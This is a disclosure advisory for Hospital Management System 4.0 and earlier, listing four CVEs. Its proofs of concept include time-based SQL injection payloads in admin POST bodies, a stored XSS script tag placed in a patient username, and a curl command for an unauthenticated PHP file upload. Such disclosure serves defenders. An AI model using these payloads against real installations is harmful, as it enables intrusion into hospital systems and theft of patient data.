Headline
Hospital Management System 4.0 XSS / Shell Upload / SQL Injection
Hospital Management System versions 4.0 and below suffer from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.
Description: Mutiple vulnerabilties were discovered in Hospital Management SystemAffected CMS: Hospital Management SystemAffected Version: <= 4.0CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630CVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HDiscoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.LtdMultiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.Proof of Concept:Attack Vector 1 (Time-Based SQL injection):Step 1.) Login adminStep 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submitStep 3.) Replace the POST body to below payload and server will respond after 5 second.adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=Attack Vector 2 (Time-Based SQL injection):Step 1.) Login adminStep 2.) Go to Doctors -> Doctor Specialization -> Click SubmitStep 3.) Replace the POST body to below payload and server will respond after 5 second.doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=Attack Vector 3 (Cross Site Scripting (XSS)):After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.Step 1.) Login patient pageStep 2.) Got to My Profile>Edit Profile.Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and saveStep 4.) Other user visit this profile will trigger xssAttacker Vector 4 (Unauthenticated Arbitrary File Upload):The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.Step 1.) upload file with below curl command:curl -i -s -k -X $'POST' \ -H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \ --data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \ $'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'Step 2.) visit the url in response and trigger the php file.RecommendationUpdate to v5.2.0https://phpgurukul.com/contact-us/https://phpgurukul.com/hospital-management-system-in-php